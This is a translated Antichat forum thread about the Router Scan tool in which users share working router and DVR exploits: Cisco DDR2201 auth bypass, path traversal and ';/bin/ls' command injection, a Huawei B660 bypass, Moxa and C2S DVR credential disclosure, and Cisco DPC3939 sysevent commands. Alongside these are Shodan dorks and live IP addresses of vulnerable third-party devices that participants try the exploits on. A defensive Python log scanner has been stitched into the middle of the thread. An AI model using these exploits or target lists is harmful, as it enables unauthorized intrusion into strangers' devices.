Antichat - official site

The Router Scan program

Discussion in 'Wireless technologies/Wi-Fi/Wardriving' started by СЕРЖ32, 11 Nov 2013.

  1. Triton_Mgn

    Triton_Mgn Elder

    And what does RS have to do with it? This can be done with vistumbler + a USB GPS. I did it that way myself; the access points are placed on the map with their signal levels, and there is a guide online for setting up that combination.
     
    1. binarymaster

      binarymaster Elder

      @Fusix had the idea of bolting a similar feature onto the 3WiFi Android app. If he does it, it would make sense to have him add the same functionality to RS.

      Though there has been no news from him on this topic for a long time.
       
      1. gaww

        gaww New Member

        I have the same thing with this TP-Link 722N; rarely, but it happens. It is definitely because of it.
         
        1. sha9

          sha9 Well-Known Member

          An interesting exploit for the Cisco DDR2201
          *Issue Description*
          Some routers of the Cisco DDR2200 series show several vulnerabilities: authentication bypass, remote code execution and path traversal.

          As a result, an attacker can gain access to the router configuration, access internal files and achieve limited command execution.

          *Shodan Dork*
          http.title:"Cisco DDR2201v1 ADSL2+ Residential Gateway"
          http.title:"Cisco DDR2200 ADSL2+ Residential Gateway"

          *Affected Components*
          *Device*: Cisco DDR2201v1 ADSL2+ Residential Gateway
          *Software Version*: DDR2201v1-NA-AnnexA-FCC-V00.00.03.28.3
          Path Traversal
          Bypass Authentication
          Remote code execution (RCE)

          *Device*: Cisco DDR2200 ADSL2+ Residential Gateway
          *Software Version*: DDR2200B-NA-AnnexA-FCC-V00.00.03.45.4E
          Remote code execution (RCE)
          Path Traversal

          *Vulnerabilities details*
          Bypass Authentication
          Some pages don't need the user to be authenticated to gain access:
          http://192.168.0.1:8080/info.html
          http://192.168.0.1:8080/wancfg.cmd?action=view
          http://192.168.0.1:8080/rtroutecfg.cmd?action=view
          http://192.168.0.1:8080/arpview.cmd
          http://192.168.0.1:8080/cpuview.cmd
          http://192.168.0.1:8080/memoryview.cmd
          http://192.168.0.1:8080/statswan.cmd
          http://192.168.0.1:8080/statsatm.cmd
          http://192.168.0.1:8080/scsrvcntr.cmd?action=view
          http://192.168.0.1:8080/scacccntr.cmd?action=view
          http://192.168.0.1:8080/logview.cmd
          http://192.168.0.1:8080/voicesipview.cmd
          http://192.168.0.1:8080/voicesipview.cmd?view=advanced
          http://192.168.0.1:8080/usbview.cmd
          http://192.168.0.1:8080/wlmacflt.cmd?action=view
          http://192.168.0.1:8080/wlwds.cmd
          http://192.168.0.1:8080/wlstationlist.cmd
          http://192.168.0.1:8080/HPNAShow.cmd
          http://192.168.0.1:8080/HPNAView.cmd
          http://192.168.0.1:8080/qoscls.cmd?action=view
          http://192.168.0.1:8080/qosqueue.cmd?action=view
          http://192.168.0.1:8080/portmap.cmd
          http://192.168.0.1:8080/scmacflt.cmd?action=view
          http://192.168.0.1:8080/scinflt.cmd?action=view
          http://192.168.0.1:8080/scoutflt.cmd?action=view
          http://192.168.0.1:8080/certlocal.cmd?action=view
          http://192.168.0.1:8080/certca.cmd?action=view
          http://192.168.0.1:8080/waitPingqry.cgi
          http://192.168.0.1:8080/PingMsg.cmd

          *Path Traversal*
          The page used to download the configuration file is vulnerable to path traversal, which allows an attacker to download any system file.
          http://192.168.0.1:8080/download.conf?filename=/etc/passwd

          *Remote code execution (RCE)*
          *Description*
          The ping function allows arbitrary code execution. Just add a ; and then the full path of a binary:
          http://192.168.0.1:8080/waitPingqry.cgi?showPingResult=1&pingAddr=;/bin/ls
          After the previous request finishes, just access the following page to see the output:
          http://192.168.0.1:8080/PingMsg.cmd

          But somehow I can't find a dork on Shodan to experiment with. Has anyone happened to come across such a router? If there is an address, it would be interesting to check...
           
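A defender-side illustration of the three DDR2200 issues in the advisory above, added here and not part of the advisory, the forum post or any vendor code: it scans constructed access-log lines for the unauthenticated .cmd pages, the download.conf traversal and shell metacharacters in pingAddr, and shows the strict allow-list a fixed firmware should apply to pingAddr before it reaches a shell. The log lines, client IPs and the page subset are constructed assumptions.

```python
import ipaddress
import re
from urllib.parse import unquote

# Subset of the pages the advisory lists as reachable without authentication.
UNAUTH_PAGES = {
    "/info.html", "/wancfg.cmd", "/rtroutecfg.cmd", "/arpview.cmd",
    "/logview.cmd", "/portmap.cmd", "/certlocal.cmd", "/certca.cmd",
    "/waitPingqry.cgi", "/PingMsg.cmd",
}

# Common log format: client - - [time] "request line" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([^"]*)" (\d{3})')

# Plain hostname: letters, digits, dots and hyphens only (no shell metacharacters).
HOSTNAME_RE = re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9.-]{0,252}[A-Za-z0-9])?")

# Constructed sample lines (not captured from any real device).
SAMPLE_LOG = [
    '192.0.2.10 - - [29/Jul/2017:10:00:01 +0000] "GET /info.html HTTP/1.1" 200 1834',
    '192.0.2.10 - - [29/Jul/2017:10:00:02 +0000] "GET /download.conf?filename=/etc/passwd HTTP/1.1" 200 412',
    '192.0.2.10 - - [29/Jul/2017:10:00:03 +0000] "GET /waitPingqry.cgi?showPingResult=1&pingAddr=;/bin/ls HTTP/1.1" 200 97',
    '192.0.2.10 - - [29/Jul/2017:10:00:04 +0000] "GET /PingMsg.cmd HTTP/1.1" 200 640',
    '192.0.2.11 - - [29/Jul/2017:10:01:00 +0000] "GET /index.html HTTP/1.1" 200 2210',
    '192.0.2.11 - - [29/Jul/2017:10:01:05 +0000] "GET /download.conf?filename=backupsettings.conf HTTP/1.1" 200 5120',
]


def pingaddr_is_safe(value: str) -> bool:
    """Allow-list check a patched firmware should apply before pingAddr is handed
    to a shell: accept an IP literal or a plain hostname, nothing else.
    A ';' or any other shell metacharacter fails both branches."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return HOSTNAME_RE.fullmatch(value) is not None


def parse_query(query: str) -> dict:
    """Split a query string on '&' only and percent-decode twice, so that a
    double-encoded '..' or ';' is still visible to the checks below."""
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params.setdefault(unquote(key), []).append(unquote(unquote(value)))
    return params


def classify_request(request_line: str) -> list:
    """Return the findings for one request line such as 'GET /x?y HTTP/1.1'."""
    parts = request_line.split()
    if len(parts) < 2:
        return []
    path, _, query = parts[1].partition("?")
    params = parse_query(query)
    findings = []
    if path in UNAUTH_PAGES:
        findings.append("unauth-page")
    if path == "/download.conf":
        for name in params.get("filename", []):
            # The advisory's request uses an absolute path; '..' covers relative escapes.
            if name.startswith("/") or ".." in name:
                findings.append("path-traversal")
    if path == "/waitPingqry.cgi":
        for addr in params.get("pingAddr", []):
            if not pingaddr_is_safe(addr):
                findings.append("cmd-injection")
    return findings


def scan_access_log(lines):
    """Return (client, request_line, findings) for every line with a finding."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = classify_request(m.group(2))
        if findings:
            hits.append((m.group(1), m.group(2), findings))
    return hits


if __name__ == "__main__":
    for client, req, findings in scan_access_log(SAMPLE_LOG):
        print(client, ",".join(findings), req)
```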
          1. binarymaster

            binarymaster Elder

            Judging by the page URLs, this is a firmware based on Micro DSL.

            So search by Server: micro_httpd
             
            1. exzet

              exzet Active Member

              It's written right there
              :D
              Here are working ones
              http://190.166.53.55:8080
              http://148.0.194.223:8080
               
              1. sha9

                sha9 Well-Known Member

                Thanks for the help. I did see that the dork is given in the exploit description; apparently I phrased it badly. For some reason it didn't work for me on Shodan, the query returned nothing.
                I searched with that query too. Found a couple, but apparently something is off: it downloads the config, but the config contains only a couple of HTML tags :( In the IPs that exzet found everything is much better :)
                 
                1. sha9

                  sha9 Well-Known Member

                  A neat exploit for the Huawei Flybox B660 router.
                  Document Title:
                  ===============
                  Huawei Flybox B660 3G/4G Router - Auth Bypass Vulnerability


                  References (Source):
                  ====================
                  https://www.vulnerability-lab.com/get_content.php?id=2010

                  Huawei ID: 558969357627813


                  Release Date:
                  =============
                  2016-11-18

                  Vulnerability Laboratory ID (VL-ID):
                  ====================================
                  2010
                  Common Vulnerability Scoring System:
                  ====================================
                  7.4
                  Product & Service Introduction:
                  ===============================
                  The Huawei B660 has a web interface for configuration. You can use any web browser you like to login to the Huawei B660.

                  Abstract Advisory Information:
                  ==============================
                  The vulnerability laboratory core research team discovered a security flaw that affects the official Huawei Flybox B660 3g/4g router product series.


                  Vulnerability Disclosure Timeline:
                  ==================================
                  2016-11-18: Public Disclosure (Vulnerability Laboratory)


                  Discovery Status:
                  =================
                  Published


                  Affected Product(s):
                  ====================
                  Huawei
                  Product: Flybox - Router (Web-Application) B660 3G/4G


                  Exploitation Technique:
                  =======================
                  Remote


                  Severity Level:
                  ===============
                  Critical


                  Technical Details & Description:
                  ================================
                  A remote auth bypass vulnerability has been discovered in the official Huawei Flybox B660 3g/4g router product series.
                  The security vulnerability allows remote attackers to compromise any Huawei Flybox B660
                  Admin Panel using a new bypass method.

                  The vulnerability is located in the `./htmlcode/html/` modules and the `indexdefault.asp` file of the
                  localhost path URL. Remote attackers are able to compromise any Huawei Flybox B660 admin panel
                  via an unauthenticated GET method request.

                  The security risk of the issue is estimated as critical with a CVSS count of 7.4. (CVSS 7.4)
                  Exploitation of the web vulnerability requires no privileged account or user interaction.
                  Successful exploitation of the vulnerability results in compromise of the Huawei Flybox device.

                  Request Method(s):
                  [+] GET

                  Vulnerable Module(s):
                  [+] /htmlcode/html/

                  Vulnerable File(s):
                  [+] indexdefault.asp


                  Software version of the modem:
                  1066.12.15.01.200

                  Hardware version of the modem:
                  WLB3TCLU

                  Name of the device:
                  B660

                  Hardware version of the router:
                  WL1B660I001

                  Software version of the router:
                  1066.11.15.02.110sp01


                  Proof of Concept (PoC):
                  =======================
                  The vulnerability can be exploited by remote attackers without privileged user account or user interaction.
                  For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

                  After buying a Flybox Huawei B660, the company sets up a password for you like: "admin", "12345" or "55555".
                  We figured out that when you lose your password, you can attempt to connect multiple times using the plain passwords above.
                  After the third request the connection will be refused with an exception message; by intercepting the request and passing the error,
                  it is possible to bypass the authentication mechanism of the 3g/4g router device. The problem in the Flybox Huawei B660 is the following:
                  there is no test whether the password is false or true. If an attacker tries a false password many times on requests, after
                  the bypass of the error they redirect you to change your password permanently.


                  --- PoC Session Logs [GET] ---
                  GET /htmlcode/html/contentdefault.asp HTTP/1.1
                  Host: localhost
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                  Accept-Encoding: gzip, deflate, lzma, sdch
                  Accept-Language: en-US,en;q=0.8
                  Cookie: login_url=settings; CNZZDATA1260483764=1049902387-1478277586-%7C1478277586; Basic=index; Language=en; SessionID_R3=1006428909
                  Referer: http://localhost/htmlcode/html/content.asp
                  Upgrade-Insecure-Requests: 1
                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36 OPR/41.0.2353.46
                  HTTP/1.1 200 OK
                  CACHE-CONTROL: no-cache
                  Content-Length: 5776
                  Content-Type: text/html


                  PoC Video:
                  It looks interesting on the video. Let's see in practice; I'll give it a try. Maybe someone else will be interested too ;):)

                  P.S. This exploit reminds me of an old IT joke:
                  a Chukchi hacker hacked the NSA. Attack technique: he kept entering the password admin:admin until the server agreed with him :D
                   
                  #4228 sha9, 29 Jul 2017
                  Last edited: 29 Jul 2017
                  1. sha9

                    sha9 Well-Known Member

                    An exploit for Moxa Industrial Secure Routers
                    Title: Industrial Secure Routers - Insecure Configuration Management
                    Type: Local/Remote
                    Author: Nassim Asrir
                    Author Company: HenceForth
                    Impact: Insecure Configuration Management
                    Risk: (4/5)
                    Release Date: 22.10.2016

                    Summary:
                    Moxa's EDR series industrial Gigabit-performance secure routers are designed to protect the control networks of critical facilities while maintaining fast data transmissions.
                    The EDR series security routers provide integrated cyber security solutions that combine industrial firewall, VPN, router, and L2 switching* functions into one product specifically
                    designed for automation networks, which protects the integrity of remote access and critical devices.

                    description:

                    Using this vulnerability we can change the admin configuration without knowing the password & username,

                    because the form for changing the configuration is insecure.

                    Vendor:
                    http://www.moxa.com/product/Industrial_Secure_Routers.htm

                    Affected Version:
                    EDR-810, EDR-G902 and EDR-G903

                    Tested On:
                    Linux // Dist (Bugtraq 2)

                    Vendor Status:
                    I told them and I am waiting for the answer.

                    PoC:
                    - When you navigate to the server, you are automatically redirected to the login page (http://site/login.asp).

                    - So just add (admin.htm) to the end of the URL; then you get the form to change the admin configuration.

                    Example:
                    http://69.146.238.139/admin.htm

                    Found on Shodan with the query EDR-G902

                    P.S. For those interested in the IP camera topic:
                    an exploit for the C2S DVR (if it's old news, forgive me).
                    1. Advisory Information
                    ========================================
                    Title : C2S DVR Management Remote Credentials Disclosure & Authentication Bypass
                    Vendor Homepage : http://www.cash2s.com/en/
                    Remotely Exploitable : Yes
                    Tested on Camera types : IRDOME-II-C2S, IRBOX-II-C2S, DVR
                    Vulnerabilities : Credentials Disclosure
                    + : Authentication bypass
                    Date : 19/08/2016
                    Shodan Dork : html:write.cgi "Content-length: 2676"
                    Author : Yakir Wizman (https://www.linkedin.com/in/yakirwizman)


                    2. CREDIT
                    ========================================
                    This vulnerability was identified during penetration test by Yakir Wizman.


                    3. Description
                    ========================================
                    C2S DVR allows an unauthenticated user to disclose the username & password remotely by a simple request to the server page 'read.cgi?page=2', which can be made by a browser or Burp/Fiddler.
                    Moreover, an attacker could easily access the password change page without any authentication; that happens because the web application does not perform any session management.


                    4. Proof-of-Concept:
                    ========================================
                    Remote Credentials Disclosure:
                    -----------------------------------------------
                    Simply go to the following url to read the credentials:
                    http://host:port/cgi-bin/read.cgi?page=2

                    It should return some JavaScript variables which contain the credentials and other configuration vars:

                    var pw_enflag = "1";
                    var pw_adminpw = "12345";
                    var pw_retype1 = "12345";
                    var pw_userpw = "56789";
                    var pw_retype2 = "56789";
                    var pw_autolock = "0";


                    Login @ http://host:port/
                    -----------------------------------------------


                    Authentication Bypass:
                    -----------------------------------------------
                    The application does not require a valid session for any page on the server; for example, you can access 'password.htm', which allows you to change/disclose the admin password with just a few clicks.

                    http://host:port/password.htm?parm1=&parm2=1

                    Example:
                    http://82.127.159.231:81/cgi-bin/read.cgi?page=2
                     
                    #4229 sha9, 29 Jul 2017
                    Last edited: 29 Jul 2017
                    1. exzet

                      exzet Active Member

                      Maybe there was an error when copying the dork? If the first or last character is missing, it finds nothing, or rather returns an error. Otherwise it finds everything, only there are a lot of stale IPs.
                       
                      1. sha9

                        sha9 Well-Known Member

                        Yes, I figured it out later. I stuck in an extra space and didn't notice :) And there really are a lot of stale IPs. I was looking for a couple of IPs to test a sploit on a Bell router (some old DSL-G...) and a Western Digital iCloud; found some only in India and not a single IP responds :mad::)
                         
                        #4231 sha9, 30 Jul 2017
                        Last edited: 30 Jul 2017
                        1. Kakoluk

                          Kakoluk Banned

                          Please add detection for the new (Rostelecom) Huawei HG8245H firmware.
                          Everyone has the pair root:admin
                          https://yadi.sk/d/wX-7y6us3La3FV

                          And please look at the QTECH QBR-1041WU MTS. (engineer:amplifier:...:161)
                          The firmwares are identical, down to the date/time, but they are not detected:
                          https://yadi.sk/d/1VNpG2fi3LaA9k
                           
                          #4232 Kakoluk, 31 Jul 2017
                          Last edited: 31 Jul 2017
                          1. Kakoluk

                            Kakoluk Banned

                            To binarymaster: it's a pity that support for the graphical captcha on the ZTE ZXHN H168N V3.1 was not added. :(
                            I looked at the ISP's ranges (decided to go all in and check by hand; checked about 50 in a random sample). Roughly every 5th to 7th device has the default pair. And there are so many of them (!).
                             
                            1. sha9

                              sha9 Well-Known Member

                              A fresh exploit for the Cisco DPC3939. Not suitable for Router Scan, but it seems to work on the LAN. Maybe it will be useful to someone for general information ;):)

                              Bastille Tracking Number 22
                              CVE-2017-9479
                              Overview
                              A vulnerability has been discovered that enables an attacker to launch applications on a gateway as a root user. This vulnerability can be exploited by an attacker connected to the LAN, private Wi-Fi AP, or Xfinity Home Security AP.
                              Affected Platforms
                              Cisco DPC3939, firmware version dpc3939-P20-18-v303r20421746-170221a-CMCST
                              Proof-of-Concept
                              The syseventd service provides a mechanism to launch applications on the gateway in response to certain events, such as the one-minute cron job firing. The sysevent command line application is used to communicate with the syseventd server, which is open on port 52378 to the LAN, private Wi-Fi AP, and Xfinity Home Security Wi-Fi AP.
                              An attacker on one of the above networks can take advantage of this, using the sysevent command line application to launch applications on the gateway.
                              The following two commands, when executed from a computer connected to an Xfinity Home Security Wi-Fi AP, will cause the persistent storage configuration data to be copied to /var/IGD/. This can then be retrieved by the attacker.
                              ./sysevent --port 52367 --ip 172.16.12.1 async </path/to/file> /bin/cp
                              ./sysevent --port 52367 --ip 172.16.12.1 set </path/to/file> /var/IGD/<file>
                              Test Environment
                              Cisco DPC3939, firmware version dpc3939-P20-18-v303r20421746-170221a-CMCST
                              Mitigation
                              There is no apparent mechanism to allow Comcast customers to disable syseventd access.
                              Recommended Remediation
                              Update the firewall rules to disable access to syseventd from the LAN, private Wi-Fi AP, and Xfinity Home Security Wi-Fi AP.
                              Credits
                              Marc Newlin and Logan Lamb, Bastille
                              Chris Grayson, Web Sight.IO
                               
                              1. binarymaster

                                binarymaster Elder

                                You bet! :rolleyes:
                                 
                                1. Triton_Mgn

                                  Triton_Mgn Elder

                                  Waiting for the official release with the help file, so we don't have to ask questions.
                                   
                                  1. gentux

                                    gentux Member

                                    Maybe with the official release @binarymaster will create a new thread; he will get the ability to edit the OP post, it will be easier for newcomers to find the program, and this thread has grown too large anyway.
                                    And also, I'd like to have the new feature in Linux under Wine.
                                    https://habrastorage.org/web/6fe/08f/92f/6fe08f92fc4840d7a74a26e08f013d93.png
                                     
                                    1. binarymaster

                                      binarymaster Elder

                                      You would have to write to the Wine developers for that, so they finish the WLAN API layer.
                                       
                                      1. Paradiz

                                        Paradiz Member

                                        What do these errors mean? I can't upload the scan result to 3wifi.
                                         
                                        1. exzet

                                          exzet Active Member

                                          They can see it (especially those who are directly connected), but it doesn't fall under a criminal article.
                                           